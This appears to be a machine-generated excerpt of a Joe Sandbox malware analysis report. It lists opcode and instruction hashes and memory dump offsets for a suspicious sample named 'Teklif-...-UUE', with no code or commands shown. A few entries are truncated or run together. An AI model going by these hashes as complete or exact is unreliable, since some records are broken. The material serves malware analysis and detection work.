                                                          • Instruction ID: 89f3d1aeb269a5ec80a016185b8002f49212c58e1d25bd12af8aff7e27102033
                                                          • Opcode Fuzzy Hash: 0c29357a31967aab49f4602af9a075c5fb7e7eee71c039088c8f6e3559adeb7e
                                                          • Instruction Fuzzy Hash: E7F0F970979319CFCF249AA4B2157BD76A1EB48300F30C46AC11366261CABD0E01A7D6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f3b174d1f871c3a232c131e10028f38bb3e4bdb041734b062d3036e879fd97e4
                                                          • Instruction ID: d39e7bb1c2a72fd4f04b5a2aa077591eb01cdc0fbf560191947e5e9a2b5acb55
                                                          • Opcode Fuzzy Hash: f3b174d1f871c3a232c131e10028f38bb3e4bdb041734b062d3036e879fd97e4
                                                          • Instruction Fuzzy Hash: 1201E274801229CFDB60DF28C994BEDBBF6FB05304F9480D9E148A7240DB744A88EF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4d3c0d30a55187983612f974d91c961ef8861022d5ee29f58af4c02245ec429d
                                                          • Instruction ID: 6770538988d481b158f900ee76587610ad3164f803cab57f758347ea9ea82c2e
                                                          • Opcode Fuzzy Hash: 4d3c0d30a55187983612f974d91c961ef8861022d5ee29f58af4c02245ec429d
                                                          • Instruction Fuzzy Hash: 44F05E7590420CEFCB05CF98DD41ADCBBB5EB49300F04C5A9E92953351C7329A66EF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 432c1dc090e2d0ad41fe8715333f3d8f702969acb1f3c38e32ed50b4f0f9e2ca
                                                          • Instruction ID: 82b2b3c177a3e7f37d64d52886328dbd9d9cad1ddc7bafebbd9ddedd531d227d
                                                          • Opcode Fuzzy Hash: 432c1dc090e2d0ad41fe8715333f3d8f702969acb1f3c38e32ed50b4f0f9e2ca
                                                          • Instruction Fuzzy Hash: 53F0E73180421AEBCF11EF99D8009EEBB75FF89320F04D619E95827251D736A5A6DB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 969fc3f73706d85b7290e69a93854613c2a3d2e21123c2b0da763c655df286fa
                                                          • Instruction ID: dc165dc1a29b16a1d7ea70ff20c3ba41d877c70231cac7a4e4db178159c5be69
                                                          • Opcode Fuzzy Hash: 969fc3f73706d85b7290e69a93854613c2a3d2e21123c2b0da763c655df286fa
                                                          • Instruction Fuzzy Hash: CE019AB4A01218CFDB64DF28D885B99B7F2BB09300F4480DAE54DE7246DB709E848F00
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4d348a27f653a7e2819b1e64c5eee54ee11c652ccf48e162d16660c27170bb2c
                                                          • Instruction ID: 91039fc9f02e9c10da1652de988b28cdcb519c0d7b7fc0c3d6efbadb170e3890
                                                          • Opcode Fuzzy Hash: 4d348a27f653a7e2819b1e64c5eee54ee11c652ccf48e162d16660c27170bb2c
                                                          • Instruction Fuzzy Hash: D2F05E3A3502009FC714DF29D454E2AB7AAEFC8721B108469F9068B760CA71EC42CB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a4f6d6ca8bce04b276afda0cc93179d48ce86d247cee830d00e909ad485aaad2
                                                          • Instruction ID: 77ec1d37e3751a56e5a6d19d97f3fd2bf9dbb29decb3019001915c9157ecc3a2
                                                          • Opcode Fuzzy Hash: a4f6d6ca8bce04b276afda0cc93179d48ce86d247cee830d00e909ad485aaad2
                                                          • Instruction Fuzzy Hash: 3BF09A32A40219EBDB08DB91CD06ADEBBF2FB89201F244829D401B73A4DB755D05CAE0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8b096e036bf75b87b6cfc53723fcf7ce8dff7eb37d3d4665f5e8a46409639f1
                                                          • Instruction ID: b7776945f46b77ac7b6d327e1226ccd0827b1cad9f292542b37f32362f0068d8
                                                          • Opcode Fuzzy Hash: e8b096e036bf75b87b6cfc53723fcf7ce8dff7eb37d3d4665f5e8a46409639f1
                                                          • Instruction Fuzzy Hash: C8F08231A08218AFDB09DBA9D4497CD7FB6EB84720F18C1A5D006D7681DB795A86CB84
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8cf01a7f2843095a9d1e0cd403e8c7e6f44dfbdfec59235fe8580babd6b2e68
                                                          • Instruction ID: 128d6de6e9604a4ed18e7a38bc72bbf42a22a233f0772e810052de83950aa470
                                                          • Opcode Fuzzy Hash: e8cf01a7f2843095a9d1e0cd403e8c7e6f44dfbdfec59235fe8580babd6b2e68
                                                          • Instruction Fuzzy Hash: E3011434911218CFDB44DF98D899B9CBBB2FB49325F1048A9E809AB341CB755E84CF11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8fd3d0ea8ce480929fd39bca2b60980745c3420e764770a26aa025b3258dde15
                                                          • Instruction ID: 79a6279a7e5288202cb737c17c89e63cd34a11da79e6e3427163056d3e7dcb36
                                                          • Opcode Fuzzy Hash: 8fd3d0ea8ce480929fd39bca2b60980745c3420e764770a26aa025b3258dde15
                                                          • Instruction Fuzzy Hash: C3F01C39D04208EFCB45CF98D851BADBBB5EB48314F14C1AAEC6857351D6329A62EF90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02f3a1ab96bab58a8059cc4b355a9b0d4b4ef6342130f019c81366d50dfe9c62
                                                          • Instruction ID: 9e9490921582e058e349b8123bb114798d622c2131e6af5308990fd24ca634f2
                                                          • API String ID:
                                                          • Opcode ID: 1dc533d425a2f6e7c4520c4f029a93f09eca93b5a0f661ef4ff80ac2acdc534a
                                                          • Instruction ID: 2b95484a12591ab3e103c92e1f4933cae97548dff17ef0f9d7a8fd2ad4359f97
                                                          • Opcode Fuzzy Hash: 1dc533d425a2f6e7c4520c4f029a93f09eca93b5a0f661ef4ff80ac2acdc534a
                                                          • Instruction Fuzzy Hash: 58F01574908208EFCB05CF98D8409ACBBB6FF88310F10C099EC1853351C7329A61EF81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bc5e0f8cd87a601495014f8fe984831513b61b4373c4efa01bc6937d2deacc2f
                                                          • Instruction ID: 4795154dce6bdb8315c27ddee3f79bbc3c6615183a44213b1cd59d57886110fd
                                                          • Opcode Fuzzy Hash: bc5e0f8cd87a601495014f8fe984831513b61b4373c4efa01bc6937d2deacc2f
                                                          • Instruction Fuzzy Hash: F2F030309142049FCB44DFBCC481BD8BBB1EF05714F1045E8C84993242D7325A5ADF40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f3cdcc6b0fa2dda3764907569711765fa9e756ae95764d4a89e7dcfafc49f75a
                                                          • Instruction ID: beb42fd988df22906a45f932953d6a6674dc2a2d97cbf8767a0b0a263dff4a75
                                                          • Opcode Fuzzy Hash: f3cdcc6b0fa2dda3764907569711765fa9e756ae95764d4a89e7dcfafc49f75a
                                                          • Instruction Fuzzy Hash: 07E09A3091C2089FCB14CBA4DC925ACBFB1EB8A310F1891A9C80597352D6328906DF42
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f8d07df0d6831736992abf78a3c9869f8a4fc9a57c737de0e7ea6bc67b176dc3
                                                          • Instruction ID: 9e8707842e665d581a4bfd68c016a92cabdb3a49b3e5514ba9ee88cc827cdb5e
                                                          • Opcode Fuzzy Hash: f8d07df0d6831736992abf78a3c9869f8a4fc9a57c737de0e7ea6bc67b176dc3
                                                          • Instruction Fuzzy Hash: DCE0D838908108DBC704DF64DD097ACBBB8EB41310F1890ADCC0457341D732AA46EB95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a61f468737651102fb45e30c6f7864fcd908167fdb9ac6e391522d5fb1844d6a
                                                          • Instruction ID: f04056d5b41c681f9a4f9e11e0e2caa2d7fd85de45039cba32003aadd2666a4b
                                                          • Opcode Fuzzy Hash: a61f468737651102fb45e30c6f7864fcd908167fdb9ac6e391522d5fb1844d6a
                                                          • Instruction Fuzzy Hash: CDE0DF38908208DFC704DFA8DD857ACBBB9EF80310F5495AD880853342DA32D946DF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6ec7cb08a2b3a8d5317d7f32876968cb8e66b6bea3c235afd7fc977b4cdcd9c9
                                                          • Instruction ID: 636efbcef4c7496405cf9d1f7cb29fc16c6b824d9b09af948282d5d8cf4063d4
                                                          • Opcode Fuzzy Hash: 6ec7cb08a2b3a8d5317d7f32876968cb8e66b6bea3c235afd7fc977b4cdcd9c9
                                                          • Instruction Fuzzy Hash: 8DE09A3080A208EBCB05DFA4EC01A9CBFB6FF45301F5085A9EC44233A0C7368AA4EB41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 94d0647618d101770ca374e69e067727ce0c2d4d8ed86dd4e49944ded79814ed
                                                          • Instruction ID: dbaf46ba4493c19701c3664866c61b93a11ca48858d97e46ec22e0eb5725390f
                                                          • Opcode Fuzzy Hash: 94d0647618d101770ca374e69e067727ce0c2d4d8ed86dd4e49944ded79814ed
                                                          • Instruction Fuzzy Hash: 01F0A0349192489FCB51DBB8DA849ECBFF0AF0A214F1440E9DC45C3222D6318D44EF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a73be80048ca26b6abd297a3d43d6496ac9adb24ec4db2b06da1e312b781f7d5
                                                          • Instruction ID: ab35a6ae9ccc6959b68c5fd72c33dc1a89e43a0bca74c7d2a2cc8e1e4114ffa2
                                                          • Opcode Fuzzy Hash: a73be80048ca26b6abd297a3d43d6496ac9adb24ec4db2b06da1e312b781f7d5
                                                          • Instruction Fuzzy Hash: 95E09A38A0D204CBDB05CBA8D9047A8BFB6EB86315F18D1ACE80457341C6324956EB42
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7fdec64b36c5542b503722fdc9e712f18b183c2f7d3cc713e41679c3b02ca3be
                                                          • Instruction ID: fc4319c669ffe8005cc8261abf89b9159bdfb03a40ac18e5d83a41abce4c99e4
                                                          • Opcode Fuzzy Hash: 7fdec64b36c5542b503722fdc9e712f18b183c2f7d3cc713e41679c3b02ca3be
                                                          • Instruction Fuzzy Hash: D8E0923890D2089FCB14DF94DC456ADBBB4EB45315F1491BE9C0417381C7359A56EB82
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 58b95a5e20efd0ef2cdb8d470904c2656c909f0e11f7200d505d587c89c85dcc
                                                          • Instruction ID: f3d0d3ca2572e67091b4f38515f9af755cf8d233f1fb3e22c2fa83d3458d1166
                                                          • Opcode Fuzzy Hash: 58b95a5e20efd0ef2cdb8d470904c2656c909f0e11f7200d505d587c89c85dcc
                                                          • Instruction Fuzzy Hash: D4F0C974908208EFCB15DF94D8419ACBBB5EB88314F14C199EC5856351D6329A65EF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 57a0fa61b7dc6d2ce5b3085730feb6582d38285d4ec1c2f80ae052281d776f82
                                                          • Instruction ID: 115af36816bd3a5da7732082468e2349a695f60b6f9cfc30b815c3b0565b7a56
                                                          • Opcode Fuzzy Hash: 57a0fa61b7dc6d2ce5b3085730feb6582d38285d4ec1c2f80ae052281d776f82
                                                          • Instruction Fuzzy Hash: B1E026303C4314CBD720A264890AF6632DDAB44600F284C24DA095F290D976EC01CB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a25938b88a0e370d570edfe6d633ff1b94111f7079d57e670c1340b1ffd11b7
                                                          • Instruction ID: af6f5bf75abab7a2e9d6920b134196a399c067ded3b5b2f457e574b4f04c13ab
                                                          • Opcode Fuzzy Hash: 5a25938b88a0e370d570edfe6d633ff1b94111f7079d57e670c1340b1ffd11b7
                                                          • Instruction Fuzzy Hash: 95E0ED74D04208EFCB44DFA9D9406ACFBF5FB48315F10D5A99C09A3351D6B29A51DF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a25938b88a0e370d570edfe6d633ff1b94111f7079d57e670c1340b1ffd11b7
                                                          • Instruction ID: 5034d95fc93f1ae0e4e579c1e025b2bd75e6e2679a5ab0caf500b11c18ff3d28
                                                          • Opcode Fuzzy Hash: 5a25938b88a0e370d570edfe6d633ff1b94111f7079d57e670c1340b1ffd11b7
                                                          • Instruction Fuzzy Hash: 6AE0ED74D04208EFCB44DFA9D840AACFBF5EB48314F14C5AA9C1893351D6729E51DF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a25938b88a0e370d570edfe6d633ff1b94111f7079d57e670c1340b1ffd11b7
                                                          • Instruction ID: 733c291f3d0c6c5b84b91f7f5a3db86df42467a80fb1622e836d8b22eb8c4f51
                                                          • Opcode Fuzzy Hash: 5a25938b88a0e370d570edfe6d633ff1b94111f7079d57e670c1340b1ffd11b7
                                                          • Instruction Fuzzy Hash: 32E0ED74D0820CEFCB44DFA9D8446ADFBF5EB48314F10C5A99C1893351D6329A51EF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7cc98d6d0115a33bef4d45ed8e1df7f46f5fdc81c09d6f8326ee542baaa06987
                                                          • Instruction ID: 0c5a49d427a7caa8240b5fc17f3203ce00aa3975e7d6c69cb493a395568391d5
                                                          • Opcode Fuzzy Hash: 7cc98d6d0115a33bef4d45ed8e1df7f46f5fdc81c09d6f8326ee542baaa06987
                                                          • Instruction Fuzzy Hash: 03E01A74E08208EFCB94DFA8D9506ACFBF5FB88304F10C1A9981893351D7329A45EF81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 322d969286e4df9c666dd41daab7fa8cafd853c8bbc552cb0682667295fac533
                                                          • Instruction ID: e0fc0e2d936a0ec52f9ec726bbe4d63ff6e8173236f489e528ad332d4e27502e
                                                          • Opcode Fuzzy Hash: 322d969286e4df9c666dd41daab7fa8cafd853c8bbc552cb0682667295fac533
                                                          • Instruction Fuzzy Hash: F2E01274D08108EFC744DF99D8416ACBBF5EB88301F14C1AE9C0497351C7369A45EF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 801cd74cc30f65f01b6763605c166f2eed6da701ae572265acc6c5b608f43fc0
                                                          • Instruction ID: 7f3c034ebd0c4289caa3ef7997030d6ebae89f4f7529bf9c9fa715355e1b6645
                                                          • Opcode Fuzzy Hash: 801cd74cc30f65f01b6763605c166f2eed6da701ae572265acc6c5b608f43fc0
                                                          • Instruction Fuzzy Hash: 3BF01570945228CBE724EF64CC59BADBBBAFB45308F108598D40E67290CB301ECACF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 593ddd7821a9b774b7fec41b8b4bb8cb1cc08339240b9ea0a631637998052726
                                                          • Instruction ID: bf7d9a04853a2f9b98155cbc6d592f17d294f2446d827c62ef2e45b8f5f13aeb
                                                          • Opcode Fuzzy Hash: 593ddd7821a9b774b7fec41b8b4bb8cb1cc08339240b9ea0a631637998052726
                                                          • Instruction Fuzzy Hash: 24E0E570D09208EFCB54EFA8D40469CBBF5AB48301F50C5A9A854A2351D6399A54EF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f04c879126c2846c304825f704852f0e9e0c1a4fedd4409d1a32a7337f0cb156
                                                          • Instruction ID: a9d74e7e5a28d44f13a160a2ba91719d36ade95b7d82b20538210c4fdf3a64b4
                                                          • Opcode Fuzzy Hash: f04c879126c2846c304825f704852f0e9e0c1a4fedd4409d1a32a7337f0cb156
                                                          • Instruction Fuzzy Hash: BBE01A30918108DBCB14DFA4D882AEDBFB1EF85311F1496A9D80967361CA324A46DF46
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8f62181e95f2c85ef65ed6fcd495ad1015482f7fd655c10e42c1b3a2d29f0671
                                                          • Instruction ID: 14ea34f1a1d15d43ea1a0ff8b75290fa4f4a06142bc796d3992c17cd6ec5d93b
                                                          • Opcode Fuzzy Hash: 8f62181e95f2c85ef65ed6fcd495ad1015482f7fd655c10e42c1b3a2d29f0671
                                                          • Instruction Fuzzy Hash: 3CE0C2B044E30C9BC755DAA4DD0239C77AEDB02304F1445A8890863381DA369984DB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8c79bab585b53b1976adfb7057c595398e1005c8fac9a4a3b55d3f16915d8261
                                                          • Instruction ID: 0882f5d928a65b2955f3d32c6694ac3b3dd8bf2f3dd3ac8472b8c058ead5ada0
                                                          • Opcode Fuzzy Hash: 8c79bab585b53b1976adfb7057c595398e1005c8fac9a4a3b55d3f16915d8261
                                                          • Instruction Fuzzy Hash: A5E0DF78809108DBCB58DF94EC41BEEBBB9EB45306F1490A9CC0813352C7329E05EF82
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction ID: a58c92627b6f77bc68cabf76b181bf1c4ffa02cea7cb2eded5a2fe856d046a5a
                                                          • Opcode Fuzzy Hash: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction Fuzzy Hash: 1DE0C234908208DBC704DF94DD805ACBBB9EB85300F51D1ACCC0813341DA339E46DF81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction ID: 0950011a932b445f3ee30277e87f73edeba689afafb904568f16f04f73eb02f4
                                                          • Opcode Fuzzy Hash: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction Fuzzy Hash: E5E0C234D08208EBC704EF98D8845ACBBB9EB85300F10D198CC0813341C6339E46DBC1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction ID: e17ccd52121515c332c54a5324a165f1a83300dbcbf6493d49a1cece33c92d24
                                                          • Opcode Fuzzy Hash: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction Fuzzy Hash: 92E01278909208DFCB04DF98DD415ACBBB9EB85315F14D199DC0917351C6329E56EB81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
